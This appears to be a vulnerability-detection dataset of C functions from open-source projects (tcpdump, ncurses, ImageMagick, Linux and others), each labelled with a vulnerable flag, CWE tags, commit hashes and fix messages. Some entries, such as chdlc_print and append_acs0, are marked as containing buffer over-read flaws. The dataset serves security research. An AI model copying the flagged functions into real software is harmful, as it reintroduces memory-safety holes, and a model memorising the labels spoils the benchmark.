tun: call dev_get_valid_name() before register_netdevice() register_netdevice() could fail early when we have an invalid dev name, in which case ->ndo_uninit() is not called. For tun device, this is a problem because a timer etc. are already initialized and it expects ->ndo_uninit() to clean them up. We could move these initializations into a ->ndo_init() so that register_netdevice() knows better, however this is still complicated due to the logic in tun_detach(). Therefore, I choose to just call dev_get_valid_name() before register_netdevice(), which is quicker and much easier to audit. And for this specific case, it is already enough. Fixes: 96442e42429e ("tuntap: choose the txq based on rxq") Reported-by: Dmitry Alexeev <[email protected]> Cc: Jason Wang <[email protected]> Cc: "Michael S. Tsirkin" <[email protected]> Signed-off-by: Cong Wang <[email protected]> Signed-off-by: David S. Miller <[email protected]>
alt_merge_opt_exact_info(OptExactInfo* to, OptExactInfo* add, OptEnv* env) { int i, j, len; if (add->len == 0 || to->len == 0) { clear_opt_exact_info(to); return ; } if (! is_equal_mml(&to->mmd, &add->mmd)) { clear_opt_exact_info(to); return ; } for (i = 0; i < to->len && i < add->len; ) { if (to->s[i] != add->s[i]) break; len = enclen(env->enc, to->s + i); for (j = 1; j < len; j++) { if (to->s[i+j] != add->s[i+j]) break; } if (j < len) break; i += len; } if (! add->reach_end || i < add->len || i < to->len) { to->reach_end = 0; } to->len = i; to->ignore_case |= add->ignore_case; alt_merge_opt_anc_info(&to->anc, &add->anc); if (! to->reach_end) to->anc.right_anchor = 0; }
0
[ "CWE-125" ]
php-src
c6e34d91b88638966662caac62c4d0e90538e317
153,517,842,320,210,230,000,000,000,000,000,000,000
34
Fix bug #77371 (heap buffer overflow in mb regex functions - compile_string_node)
chdlc_print(netdissect_options *ndo, register const u_char *p, u_int length) { u_int proto; const u_char *bp = p; if (length < CHDLC_HDRLEN) goto trunc; ND_TCHECK2(*p, CHDLC_HDRLEN); proto = EXTRACT_16BITS(&p[2]); if (ndo->ndo_eflag) { ND_PRINT((ndo, "%s, ethertype %s (0x%04x), length %u: ", tok2str(chdlc_cast_values, "0x%02x", p[0]), tok2str(ethertype_values, "Unknown", proto), proto, length)); } length -= CHDLC_HDRLEN; p += CHDLC_HDRLEN; switch (proto) { case ETHERTYPE_IP: ip_print(ndo, p, length); break; case ETHERTYPE_IPV6: ip6_print(ndo, p, length); break; case CHDLC_TYPE_SLARP: chdlc_slarp_print(ndo, p, length); break; #if 0 case CHDLC_TYPE_CDP: chdlc_cdp_print(p, length); break; #endif case ETHERTYPE_MPLS: case ETHERTYPE_MPLS_MULTI: mpls_print(ndo, p, length); break; case ETHERTYPE_ISO: /* is the fudge byte set ? lets verify by spotting ISO headers */ if (length < 2) goto trunc; ND_TCHECK_16BITS(p); if (*(p+1) == 0x81 || *(p+1) == 0x82 || *(p+1) == 0x83) isoclns_print(ndo, p + 1, length - 1, ndo->ndo_snapend - p - 1); else isoclns_print(ndo, p, length, ndo->ndo_snapend - p); break; default: if (!ndo->ndo_eflag) ND_PRINT((ndo, "unknown CHDLC protocol (0x%04x)", proto)); break; } return (CHDLC_HDRLEN); trunc: ND_PRINT((ndo, "[|chdlc]")); return ndo->ndo_snapend - bp; }
1
[ "CWE-125", "CWE-787" ]
tcpdump
1dcd10aceabbc03bf571ea32b892c522cbe923de
256,938,941,802,968,770,000,000,000,000,000,000,000
63
CVE-2017-12897/ISO CLNS: Use ND_TTEST() for the bounds checks in isoclns_print(). This fixes a buffer over-read discovered by Kamil Frankowicz. Don't pass the remaining caplen - that's too hard to get right, and we were getting it wrong in at least one case; just use ND_TTEST(). Add a test using the capture file supplied by the reporter(s).
static MagickBooleanType WriteVIFFImage(const ImageInfo *image_info, Image *image) { #define VFF_CM_genericRGB 15 #define VFF_CM_NONE 0 #define VFF_DEP_IEEEORDER 0x2 #define VFF_DES_RAW 0 #define VFF_LOC_IMPLICIT 1 #define VFF_MAPTYP_NONE 0 #define VFF_MAPTYP_1_BYTE 1 #define VFF_MS_NONE 0 #define VFF_MS_ONEPERBAND 1 #define VFF_TYP_BIT 0 #define VFF_TYP_1_BYTE 1 typedef struct _ViffInfo { char identifier, file_type, release, version, machine_dependency, reserve[3], comment[512]; size_t rows, columns, subrows; int x_offset, y_offset; unsigned int x_bits_per_pixel, y_bits_per_pixel, location_type, location_dimension, number_of_images, number_data_bands, data_storage_type, data_encode_scheme, map_scheme, map_storage_type, map_rows, map_columns, map_subrows, map_enable, maps_per_cycle, color_space_model; } ViffInfo; const char *value; MagickBooleanType status; MagickOffsetType scene; MagickSizeType number_pixels, packets; MemoryInfo *pixel_info; register const IndexPacket *indexes; register const PixelPacket *p; register ssize_t x; register ssize_t i; register unsigned char *q; size_t imageListLength; ssize_t y; unsigned char *pixels; ViffInfo viff_info; /* Open output image file. */ assert(image_info != (const ImageInfo *) NULL); assert(image_info->signature == MagickCoreSignature); assert(image != (Image *) NULL); assert(image->signature == MagickCoreSignature); if (image->debug != MagickFalse) (void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename); status=OpenBlob(image_info,image,WriteBinaryBlobMode,&image->exception); if (status == MagickFalse) return(status); (void) memset(&viff_info,0,sizeof(ViffInfo)); scene=0; imageListLength=GetImageListLength(image); do { /* Initialize VIFF image structure. */ (void) TransformImageColorspace(image,sRGBColorspace); DisableMSCWarning(4310) viff_info.identifier=(char) 0xab; RestoreMSCWarning viff_info.file_type=1; viff_info.release=1; viff_info.version=3; viff_info.machine_dependency=VFF_DEP_IEEEORDER; /* IEEE byte ordering */ *viff_info.comment='\0'; value=GetImageProperty(image,"comment"); if (value != (const char *) NULL) (void) CopyMagickString(viff_info.comment,value,MagickMin(strlen(value), 511)+1); viff_info.rows=image->columns; viff_info.columns=image->rows; viff_info.subrows=0; viff_info.x_offset=(~0); viff_info.y_offset=(~0); viff_info.x_bits_per_pixel=0; viff_info.y_bits_per_pixel=0; viff_info.location_type=VFF_LOC_IMPLICIT; viff_info.location_dimension=0; viff_info.number_of_images=1; viff_info.data_encode_scheme=VFF_DES_RAW; viff_info.map_scheme=VFF_MS_NONE; viff_info.map_storage_type=VFF_MAPTYP_NONE; viff_info.map_rows=0; viff_info.map_columns=0; viff_info.map_subrows=0; viff_info.map_enable=1; /* no colormap */ viff_info.maps_per_cycle=0; number_pixels=(MagickSizeType) image->columns*image->rows; if (image->storage_class == DirectClass) { /* Full color VIFF raster. */ viff_info.number_data_bands=image->matte ? 4U : 3U; viff_info.color_space_model=VFF_CM_genericRGB; viff_info.data_storage_type=VFF_TYP_1_BYTE; packets=viff_info.number_data_bands*number_pixels; } else { viff_info.number_data_bands=1; viff_info.color_space_model=VFF_CM_NONE; viff_info.data_storage_type=VFF_TYP_1_BYTE; packets=number_pixels; if (SetImageGray(image,&image->exception) == MagickFalse) { /* Colormapped VIFF raster. */ viff_info.map_scheme=VFF_MS_ONEPERBAND; viff_info.map_storage_type=VFF_MAPTYP_1_BYTE; viff_info.map_rows=3; viff_info.map_columns=(unsigned int) image->colors; } else if (image->colors <= 2) { /* Monochrome VIFF raster. */ viff_info.data_storage_type=VFF_TYP_BIT; packets=((image->columns+7) >> 3)*image->rows; } } /* Write VIFF image header (pad to 1024 bytes). */ (void) WriteBlob(image,sizeof(viff_info.identifier),(unsigned char *) &viff_info.identifier); (void) WriteBlob(image,sizeof(viff_info.file_type),(unsigned char *) &viff_info.file_type); (void) WriteBlob(image,sizeof(viff_info.release),(unsigned char *) &viff_info.release); (void) WriteBlob(image,sizeof(viff_info.version),(unsigned char *) &viff_info.version); (void) WriteBlob(image,sizeof(viff_info.machine_dependency), (unsigned char *) &viff_info.machine_dependency); (void) WriteBlob(image,sizeof(viff_info.reserve),(unsigned char *) viff_info.reserve); (void) WriteBlob(image,512,(unsigned char *) viff_info.comment); (void) WriteBlobMSBLong(image,(unsigned int) viff_info.rows); (void) WriteBlobMSBLong(image,(unsigned int) viff_info.columns); (void) WriteBlobMSBLong(image,(unsigned int) viff_info.subrows); (void) WriteBlobMSBLong(image,(unsigned int) viff_info.x_offset); (void) WriteBlobMSBLong(image,(unsigned int) viff_info.y_offset); viff_info.x_bits_per_pixel=(unsigned int) ((63 << 24) | (128 << 16)); (void) WriteBlobMSBLong(image,(unsigned int) viff_info.x_bits_per_pixel); viff_info.y_bits_per_pixel=(unsigned int) ((63 << 24) | (128 << 16)); (void) WriteBlobMSBLong(image,(unsigned int) viff_info.y_bits_per_pixel); (void) WriteBlobMSBLong(image,viff_info.location_type); (void) WriteBlobMSBLong(image,viff_info.location_dimension); (void) WriteBlobMSBLong(image,(unsigned int) viff_info.number_of_images); (void) WriteBlobMSBLong(image,(unsigned int) viff_info.number_data_bands); (void) WriteBlobMSBLong(image,(unsigned int) viff_info.data_storage_type); (void) WriteBlobMSBLong(image,(unsigned int) viff_info.data_encode_scheme); (void) WriteBlobMSBLong(image,(unsigned int) viff_info.map_scheme); (void) WriteBlobMSBLong(image,(unsigned int) viff_info.map_storage_type); (void) WriteBlobMSBLong(image,(unsigned int) viff_info.map_rows); (void) WriteBlobMSBLong(image,(unsigned int) viff_info.map_columns); (void) WriteBlobMSBLong(image,(unsigned int) viff_info.map_subrows); (void) WriteBlobMSBLong(image,(unsigned int) viff_info.map_enable); (void) WriteBlobMSBLong(image,(unsigned int) viff_info.maps_per_cycle); (void) WriteBlobMSBLong(image,(unsigned int) viff_info.color_space_model); for (i=0; i < 420; i++) (void) WriteBlobByte(image,'\0'); /* Convert MIFF to VIFF raster pixels. */ pixel_info=AcquireVirtualMemory((size_t) packets,sizeof(*pixels)); if (pixel_info == (MemoryInfo *) NULL) ThrowWriterException(ResourceLimitError,"MemoryAllocationFailed"); pixels=(unsigned char *) GetVirtualMemoryBlob(pixel_info); q=pixels; if (image->storage_class == DirectClass) { /* Convert DirectClass packet to VIFF RGB pixel. */ number_pixels=(MagickSizeType) image->columns*image->rows; for (y=0; y < (ssize_t) image->rows; y++) { p=GetVirtualPixels(image,0,y,image->columns,1,&image->exception); if (p == (const PixelPacket *) NULL) break; for (x=0; x < (ssize_t) image->columns; x++) { *q=ScaleQuantumToChar(GetPixelRed(p)); *(q+number_pixels)=ScaleQuantumToChar(GetPixelGreen(p)); *(q+number_pixels*2)=ScaleQuantumToChar(GetPixelBlue(p)); if (image->matte != MagickFalse) *(q+number_pixels*3)=ScaleQuantumToChar((Quantum) (GetPixelAlpha(p))); p++; q++; } if (image->previous == (Image *) NULL) { status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y, image->rows); if (status == MagickFalse) break; } } } else if (SetImageGray(image,&image->exception) == MagickFalse) { unsigned char *viff_colormap; /* Dump colormap to file. */ viff_colormap=(unsigned char *) AcquireQuantumMemory(image->colors, 3*sizeof(*viff_colormap)); if (viff_colormap == (unsigned char *) NULL) ThrowWriterException(ResourceLimitError,"MemoryAllocationFailed"); q=viff_colormap; for (i=0; i < (ssize_t) image->colors; i++) *q++=ScaleQuantumToChar(image->colormap[i].red); for (i=0; i < (ssize_t) image->colors; i++) *q++=ScaleQuantumToChar(image->colormap[i].green); for (i=0; i < (ssize_t) image->colors; i++) *q++=ScaleQuantumToChar(image->colormap[i].blue); (void) WriteBlob(image,3*image->colors,viff_colormap); viff_colormap=(unsigned char *) RelinquishMagickMemory(viff_colormap); /* Convert PseudoClass packet to VIFF colormapped pixels. */ q=pixels; for (y=0; y < (ssize_t) image->rows; y++) { p=GetVirtualPixels(image,0,y,image->columns,1,&image->exception); if (p == (const PixelPacket *) NULL) break; indexes=GetVirtualIndexQueue(image); for (x=0; x < (ssize_t) image->columns; x++) *q++=(unsigned char) GetPixelIndex(indexes+x); if (image->previous == (Image *) NULL) { status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y, image->rows); if (status == MagickFalse) break; } } } else if (image->colors <= 2) { ssize_t x, y; register unsigned char bit, byte; /* Convert PseudoClass image to a VIFF monochrome image. */ for (y=0; y < (ssize_t) image->rows; y++) { p=GetVirtualPixels(image,0,y,image->columns,1,&image->exception); if (p == (const PixelPacket *) NULL) break; indexes=GetVirtualIndexQueue(image); bit=0; byte=0; for (x=0; x < (ssize_t) image->columns; x++) { byte>>=1; if (GetPixelLuma(image,p) < (QuantumRange/2.0)) byte|=0x80; bit++; if (bit == 8) { *q++=byte; bit=0; byte=0; } } if (bit != 0) *q++=byte >> (8-bit); if (image->previous == (Image *) NULL) { status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y,image->rows); if (status == MagickFalse) break; } } } else { /* Convert PseudoClass packet to VIFF grayscale pixel. */ for (y=0; y < (ssize_t) image->rows; y++) { p=GetVirtualPixels(image,0,y,image->columns,1,&image->exception); if (p == (const PixelPacket *) NULL) break; for (x=0; x < (ssize_t) image->columns; x++) { *q++=(unsigned char) ClampToQuantum(GetPixelLuma(image,p)); p++; } if (image->previous == (Image *) NULL) { status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y,image->rows); if (status == MagickFalse) break; } } } (void) WriteBlob(image,(size_t) packets,pixels); pixel_info=RelinquishVirtualMemory(pixel_info); if (GetNextImageInList(image) == (Image *) NULL) break; image=SyncNextImageInList(image); status=SetImageProgress(image,SaveImagesTag,scene++,imageListLength); if (status == MagickFalse) break; } while (image_info->adjoin != MagickFalse); (void) CloseBlob(image); return(MagickTrue); }
0
[ "CWE-400" ]
ImageMagick6
d5e7c2b5ba384e7d0d8ddac6c9ae2319cb74b9c5
294,520,202,085,113,500,000,000,000,000,000,000,000
390
https://github.com/ImageMagick/ImageMagick/issues/1286
__generic_file_splice_read(struct file *in, loff_t *ppos, struct pipe_inode_info *pipe, size_t len, unsigned int flags) { struct address_space *mapping = in->f_mapping; unsigned int loff, nr_pages, req_pages; struct page *pages[PIPE_BUFFERS]; struct partial_page partial[PIPE_BUFFERS]; struct page *page; pgoff_t index, end_index; loff_t isize; int error, page_nr; struct splice_pipe_desc spd = { .pages = pages, .partial = partial, .flags = flags, .ops = &page_cache_pipe_buf_ops, }; index = *ppos >> PAGE_CACHE_SHIFT; loff = *ppos & ~PAGE_CACHE_MASK; req_pages = (len + loff + PAGE_CACHE_SIZE - 1) >> PAGE_CACHE_SHIFT; nr_pages = min(req_pages, (unsigned)PIPE_BUFFERS); /* * Lookup the (hopefully) full range of pages we need. */ spd.nr_pages = find_get_pages_contig(mapping, index, nr_pages, pages); index += spd.nr_pages; /* * If find_get_pages_contig() returned fewer pages than we needed, * readahead/allocate the rest and fill in the holes. */ if (spd.nr_pages < nr_pages) page_cache_sync_readahead(mapping, &in->f_ra, in, index, req_pages - spd.nr_pages); error = 0; while (spd.nr_pages < nr_pages) { /* * Page could be there, find_get_pages_contig() breaks on * the first hole. */ page = find_get_page(mapping, index); if (!page) { /* * page didn't exist, allocate one. */ page = page_cache_alloc_cold(mapping); if (!page) break; error = add_to_page_cache_lru(page, mapping, index, GFP_KERNEL); if (unlikely(error)) { page_cache_release(page); if (error == -EEXIST) continue; break; } /* * add_to_page_cache() locks the page, unlock it * to avoid convoluting the logic below even more. */ unlock_page(page); } pages[spd.nr_pages++] = page; index++; } /* * Now loop over the map and see if we need to start IO on any * pages, fill in the partial map, etc. */ index = *ppos >> PAGE_CACHE_SHIFT; nr_pages = spd.nr_pages; spd.nr_pages = 0; for (page_nr = 0; page_nr < nr_pages; page_nr++) { unsigned int this_len; if (!len) break; /* * this_len is the max we'll use from this page */ this_len = min_t(unsigned long, len, PAGE_CACHE_SIZE - loff); page = pages[page_nr]; if (PageReadahead(page)) page_cache_async_readahead(mapping, &in->f_ra, in, page, index, req_pages - page_nr); /* * If the page isn't uptodate, we may need to start io on it */ if (!PageUptodate(page)) { /* * If in nonblock mode then dont block on waiting * for an in-flight io page */ if (flags & SPLICE_F_NONBLOCK) { if (TestSetPageLocked(page)) break; } else lock_page(page); /* * page was truncated, stop here. if this isn't the * first page, we'll just complete what we already * added */ if (!page->mapping) { unlock_page(page); break; } /* * page was already under io and is now done, great */ if (PageUptodate(page)) { unlock_page(page); goto fill_it; } /* * need to read in the page */ error = mapping->a_ops->readpage(in, page); if (unlikely(error)) { /* * We really should re-lookup the page here, * but it complicates things a lot. Instead * lets just do what we already stored, and * we'll get it the next time we are called. */ if (error == AOP_TRUNCATED_PAGE) error = 0; break; } } fill_it: /* * i_size must be checked after PageUptodate. */ isize = i_size_read(mapping->host); end_index = (isize - 1) >> PAGE_CACHE_SHIFT; if (unlikely(!isize || index > end_index)) break; /* * if this is the last page, see if we need to shrink * the length and stop */ if (end_index == index) { unsigned int plen; /* * max good bytes in this page */ plen = ((isize - 1) & ~PAGE_CACHE_MASK) + 1; if (plen <= loff) break; /* * force quit after adding this page */ this_len = min(this_len, plen - loff); len = this_len; } partial[page_nr].offset = loff; partial[page_nr].len = this_len; len -= this_len; loff = 0; spd.nr_pages++; index++; } /* * Release any pages at the end, if we quit early. 'page_nr' is how far * we got, 'nr_pages' is how many pages are in the map. */ while (page_nr < nr_pages) page_cache_release(pages[page_nr++]); in->f_ra.prev_index = index; if (spd.nr_pages) return splice_to_pipe(pipe, &spd); return error; }
0
[ "CWE-399" ]
linux-2.6
6a860c979b35469e4d77da781a96bdb2ca05ae64
121,375,069,238,004,950,000,000,000,000,000,000,000
194
splice: fix bad unlock_page() in error case If add_to_page_cache_lru() fails, the page will not be locked. But splice jumps to an error path that does a page release and unlock, causing a BUG() in unlock_page(). Fix this by adding one more label that just releases the page. This bug was actually triggered on EL5 by gurudas pai <[email protected]> using fio. Signed-off-by: Jens Axboe <[email protected]> Signed-off-by: Linus Torvalds <[email protected]>
static void set_ns_and_type_ex(xmlNodePtr node, char *ns, char *type) { smart_str nstype = {0}; get_type_str(node, ns, type, &nstype); set_xsi_type(node, nstype.c); smart_str_free(&nstype); }
0
[ "CWE-19" ]
php-src
c8eaca013a3922e8383def6158ece2b63f6ec483
81,595,902,128,922,180,000,000,000,000,000,000,000
7
Added type checks
u64 sched_clock_cpu(int cpu) { struct sched_clock_data *scd; u64 clock; if (sched_clock_stable()) return sched_clock(); if (unlikely(!sched_clock_running)) return 0ull; preempt_disable_notrace(); scd = cpu_sdc(cpu); if (cpu != smp_processor_id()) clock = sched_clock_remote(scd); else clock = sched_clock_local(scd); preempt_enable_notrace(); return clock; }
0
[]
linux
96b3d28bf4b00f62fc8386ff5d487d1830793a3d
115,708,631,594,516,850,000,000,000,000,000,000,000
22
sched/clock: Prevent tracing recursion in sched_clock_cpu() Prevent tracing of preempt_disable/enable() in sched_clock_cpu(). When CONFIG_DEBUG_PREEMPT is enabled, preempt_disable/enable() are traced and this causes trace_clock() users (and probably others) to go into an infinite recursion. Systems with a stable sched_clock() are not affected. This problem is similar to that fixed by upstream commit 95ef1e52922 ("KVM guest: prevent tracing recursion with kvmclock"). Signed-off-by: Fernando Luis Vazquez Cao <[email protected]> Signed-off-by: Peter Zijlstra <[email protected]> Acked-by: Steven Rostedt <[email protected]> Cc: Andrew Morton <[email protected]> Cc: Linus Torvalds <[email protected]> Link: http://lkml.kernel.org/r/1394083528.4524.3.camel@nexus Signed-off-by: Ingo Molnar <[email protected]>
static inline int gsi_irq_sharing(int gsi) { return gsi; }
0
[]
linux-2.6
f0f4c3432e5e1087b3a8c0e6bd4113d3c37497ff
198,778,032,469,776,700,000,000,000,000,000,000,000
1
[PATCH] i386: add HPET(s) into resource map Add HPET(s) into resource map. This will allow for the HPET(s) to be visibile within /proc/iomem. Signed-off-by: Aaron Durbin <[email protected]> Signed-off-by: Andi Kleen <[email protected]>
externalEntityInitProcessor3(XML_Parser parser, const char *start, const char *end, const char **endPtr) { int tok; const char *next = start; /* XmlContentTok doesn't always set the last arg */ parser->m_eventPtr = start; tok = XmlContentTok(parser->m_encoding, start, end, &next); parser->m_eventEndPtr = next; switch (tok) { case XML_TOK_XML_DECL: { enum XML_Error result; result = processXmlDecl(parser, 1, start, next); if (result != XML_ERROR_NONE) return result; switch (parser->m_parsingStatus.parsing) { case XML_SUSPENDED: *endPtr = next; return XML_ERROR_NONE; case XML_FINISHED: return XML_ERROR_ABORTED; default: start = next; } } break; case XML_TOK_PARTIAL: if (! parser->m_parsingStatus.finalBuffer) { *endPtr = start; return XML_ERROR_NONE; } return XML_ERROR_UNCLOSED_TOKEN; case XML_TOK_PARTIAL_CHAR: if (! parser->m_parsingStatus.finalBuffer) { *endPtr = start; return XML_ERROR_NONE; } return XML_ERROR_PARTIAL_CHAR; } parser->m_processor = externalEntityContentProcessor; parser->m_tagLevel = 1; return externalEntityContentProcessor(parser, start, end, endPtr); }
0
[ "CWE-611", "CWE-776", "CWE-415", "CWE-125" ]
libexpat
c20b758c332d9a13afbbb276d30db1d183a85d43
39,365,360,408,996,935,000,000,000,000,000,000,000
41
xmlparse.c: Deny internal entities closing the doctype
const Stats& SSL_CTX::GetStats() const { return stats_; }
0
[ "CWE-254" ]
mysql-server
e7061f7e5a96c66cb2e0bf46bec7f6ff35801a69
224,181,026,376,282,600,000,000,000,000,000,000,000
4
Bug #22738607: YASSL FUNCTION X509_NAME_GET_INDEX_BY_NID IS NOT WORKING AS EXPECTED.
static void framebuffer_update_request(VncState *vs, int incremental, int x, int y, int w, int h) { int width = pixman_image_get_width(vs->vd->server); int height = pixman_image_get_height(vs->vd->server); vs->need_update = 1; if (incremental) { return; } vnc_set_area_dirty(vs->dirty, width, height, x, y, w, h); }
0
[ "CWE-125" ]
qemu
bea60dd7679364493a0d7f5b54316c767cf894ef
146,795,160,502,551,310,000,000,000,000,000,000,000
14
ui/vnc: fix potential memory corruption issues this patch makes the VNC server work correctly if the server surface and the guest surface have different sizes. Basically the server surface is adjusted to not exceed VNC_MAX_WIDTH x VNC_MAX_HEIGHT and additionally the width is rounded up to multiple of VNC_DIRTY_PIXELS_PER_BIT. If we have a resolution whose width is not dividable by VNC_DIRTY_PIXELS_PER_BIT we now get a small black bar on the right of the screen. If the surface is too big to fit the limits only the upper left area is shown. On top of that this fixes 2 memory corruption issues: The first was actually discovered during playing around with a Windows 7 vServer. During resolution change in Windows 7 it happens sometimes that Windows changes to an intermediate resolution where server_stride % cmp_bytes != 0 (in vnc_refresh_server_surface). This happens only if width % VNC_DIRTY_PIXELS_PER_BIT != 0. The second is a theoretical issue, but is maybe exploitable by the guest. If for some reason the guest surface size is bigger than VNC_MAX_WIDTH x VNC_MAX_HEIGHT we end up in severe corruption since this limit is nowhere enforced. Signed-off-by: Peter Lieven <[email protected]> Signed-off-by: Gerd Hoffmann <[email protected]>
subscription *GetNextSubscription(service_info *service, subscription *current) { time_t current_time; subscription *next = NULL; subscription *previous = NULL; int notDone = 1; /* get the current_time */ time(&current_time); while (notDone && current) { previous = current; current = current->next; if (!current) { notDone = 0; next = current; } else if (current->expireTime && current->expireTime < current_time) { previous->next = current->next; current->next = NULL; freeSubscriptionList(current); current = previous; service->TotalSubscriptions--; } else if (current->active) { notDone = 0; next = current; } } return next; }
0
[ "CWE-476" ]
pupnp
c805c1de1141cb22f74c0d94dd5664bda37398e0
196,439,850,587,170,250,000,000,000,000,000,000,000
30
Fixes #177: NULL pointer dereference in FindServiceControlURLPath Also fixes its dual bug in FindServiceEventURLPath.
static int generate_one_key(ssh_string k, struct ssh_crypto_struct *crypto, unsigned char **output, char letter, size_t requested_size) { ssh_mac_ctx ctx; unsigned char *tmp; size_t size = crypto->digest_len; ctx=ssh_mac_ctx_init(crypto->mac_type); if (ctx == NULL) { return -1; } ssh_mac_update(ctx, k, ssh_string_len(k) + 4); ssh_mac_update(ctx, crypto->secret_hash, crypto->digest_len); ssh_mac_update(ctx, &letter, 1); ssh_mac_update(ctx, crypto->session_id, crypto->digest_len); ssh_mac_final(*output, ctx); while(requested_size > size) { tmp = realloc(*output, size + crypto->digest_len); if (tmp == NULL) { return -1; } *output = tmp; ctx = ssh_mac_ctx_init(crypto->mac_type); if (ctx == NULL) { return -1; } ssh_mac_update(ctx, k, ssh_string_len(k) + 4); ssh_mac_update(ctx, crypto->secret_hash, crypto->digest_len); ssh_mac_update(ctx, tmp, size); ssh_mac_final(tmp + size, ctx); size += crypto->digest_len; } return 0; }
0
[ "CWE-200" ]
libssh
4e6ff36a9a3aef72aa214f6fb267c28953b80060
254,255,474,785,499,900,000,000,000,000,000,000,000
38
dh: Fix CVE-2016-0739 Due to a byte/bit confusion, the DH secret was too short. This file was completely reworked and will be commited in a future version. Signed-off-by: Aris Adamantiadis <[email protected]> Reviewed-by: Andreas Schneider <[email protected]>
LossyDctDecoder (std::vector<char *> &rowPtrs, char *packedAc, char *packedDc, const unsigned short *toLinear, int width, int height, PixelType type) : LossyDctDecoderBase(packedAc, packedDc, toLinear, width, height) { _rowPtrs.push_back(rowPtrs); _type.push_back(type); }
0
[ "CWE-125" ]
openexr
e79d2296496a50826a15c667bf92bdc5a05518b4
148,083,929,285,795,240,000,000,000,000,000,000,000
14
fix memory leaks and invalid memory accesses Signed-off-by: Peter Hillman <[email protected]>
static int nft_deltable(struct nft_ctx *ctx) { int err; err = nft_trans_table_add(ctx, NFT_MSG_DELTABLE); if (err < 0) return err; nft_deactivate_next(ctx->net, ctx->table); return err; }
0
[ "CWE-665" ]
linux
ad9f151e560b016b6ad3280b48e42fa11e1a5440
31,499,764,981,142,287,000,000,000,000,000,000,000
11
netfilter: nf_tables: initialize set before expression setup nft_set_elem_expr_alloc() needs an initialized set if expression sets on the NFT_EXPR_GC flag. Move set fields initialization before expression setup. [4512935.019450] ================================================================== [4512935.019456] BUG: KASAN: null-ptr-deref in nft_set_elem_expr_alloc+0x84/0xd0 [nf_tables] [4512935.019487] Read of size 8 at addr 0000000000000070 by task nft/23532 [4512935.019494] CPU: 1 PID: 23532 Comm: nft Not tainted 5.12.0-rc4+ #48 [...] [4512935.019502] Call Trace: [4512935.019505] dump_stack+0x89/0xb4 [4512935.019512] ? nft_set_elem_expr_alloc+0x84/0xd0 [nf_tables] [4512935.019536] ? nft_set_elem_expr_alloc+0x84/0xd0 [nf_tables] [4512935.019560] kasan_report.cold.12+0x5f/0xd8 [4512935.019566] ? nft_set_elem_expr_alloc+0x84/0xd0 [nf_tables] [4512935.019590] nft_set_elem_expr_alloc+0x84/0xd0 [nf_tables] [4512935.019615] nf_tables_newset+0xc7f/0x1460 [nf_tables] Reported-by: [email protected] Fixes: 65038428b2c6 ("netfilter: nf_tables: allow to specify stateful expression in set definition") Signed-off-by: Pablo Neira Ayuso <[email protected]>
Filter::streamResetReasonToResponseFlag(Http::StreamResetReason reset_reason) { switch (reset_reason) { case Http::StreamResetReason::ConnectionFailure: return StreamInfo::ResponseFlag::UpstreamConnectionFailure; case Http::StreamResetReason::ConnectionTermination: return StreamInfo::ResponseFlag::UpstreamConnectionTermination; case Http::StreamResetReason::LocalReset: case Http::StreamResetReason::LocalRefusedStreamReset: return StreamInfo::ResponseFlag::LocalReset; case Http::StreamResetReason::Overflow: return StreamInfo::ResponseFlag::UpstreamOverflow; case Http::StreamResetReason::RemoteReset: case Http::StreamResetReason::RemoteRefusedStreamReset: case Http::StreamResetReason::ConnectError: return StreamInfo::ResponseFlag::UpstreamRemoteReset; case Http::StreamResetReason::ProtocolError: return StreamInfo::ResponseFlag::UpstreamProtocolError; case Http::StreamResetReason::OverloadManager: return StreamInfo::ResponseFlag::OverloadManager; } NOT_REACHED_GCOVR_EXCL_LINE; }
0
[ "CWE-703" ]
envoy
f0bb2219112d8cdb4c4e8b346834f962925362ca
147,780,325,852,172,080,000,000,000,000,000,000,000
23
[1.20] CVE-2022-21655 Crash with direct_response Signed-off-by: Otto van der Schaaf <[email protected]>
append_acs0(string_desc * dst, int code, int src) { if (src != 0) { char temp[3]; temp[0] = (char) code; temp[1] = (char) src; temp[2] = 0; _nc_safe_strcat(dst, temp); } }
1
[ "CWE-125" ]
ncurses
b025434573f466efe27862656a6a9d41dd2bd609
295,912,312,282,816,600,000,000,000,000,000,000,000
10
ncurses 6.1 - patch 20191012 + amend recent changes to ncurses*-config and pc-files to filter out Debian linker-flags (report by Sven Joachim, cf: 20150516). + clarify relationship between tic, infocmp and captoinfo in manpage. + check for invalid hashcode in _nc_find_type_entry and _nc_find_name_entry. > fix several errata in tic (reports/testcases by "zjuchenyuan"): + check for invalid hashcode in _nc_find_entry. + check for missing character after backslash in fmt_entry + check for acsc with odd length in dump_entry in check for one-one mapping (cf: 20060415); + check length when converting from old AIX box_chars_1 capability, overlooked in changes to eliminate strcpy (cf: 20001007). + amend the ncurses*-config and pc-files to take into account the rpath
int ppp_interface_is_up(struct tunnel *tunnel) { struct ifaddrs *ifap, *ifa; log_debug("Got Address: %s\n", inet_ntoa(tunnel->ipv4.ip_addr)); if (getifaddrs(&ifap)) { log_error("getifaddrs: %s\n", strerror(errno)); return 0; } for (ifa = ifap; ifa != NULL; ifa = ifa->ifa_next) { if (( #if HAVE_USR_SBIN_PPPD (tunnel->config->pppd_ifname && strstr(ifa->ifa_name, tunnel->config->pppd_ifname) != NULL) || strstr(ifa->ifa_name, "ppp") != NULL #endif #if HAVE_USR_SBIN_PPP strstr(ifa->ifa_name, "tun") != NULL #endif ) && ifa->ifa_flags & IFF_UP) { if (&(ifa->ifa_addr->sa_family) != NULL && ifa->ifa_addr->sa_family == AF_INET) { struct in_addr if_ip_addr = cast_addr(ifa->ifa_addr)->sin_addr; log_debug("Interface Name: %s\n", ifa->ifa_name); log_debug("Interface Addr: %s\n", inet_ntoa(if_ip_addr)); if (tunnel->ipv4.ip_addr.s_addr == if_ip_addr.s_addr) { strncpy(tunnel->ppp_iface, ifa->ifa_name, ROUTE_IFACE_LEN - 1); freeifaddrs(ifap); return 1; } } } } freeifaddrs(ifap); return 0; }
0
[ "CWE-295" ]
openfortivpn
60660e00b80bad0fadcf39aee86f6f8756c94f91
289,083,185,566,316,160,000,000,000,000,000,000,000
44
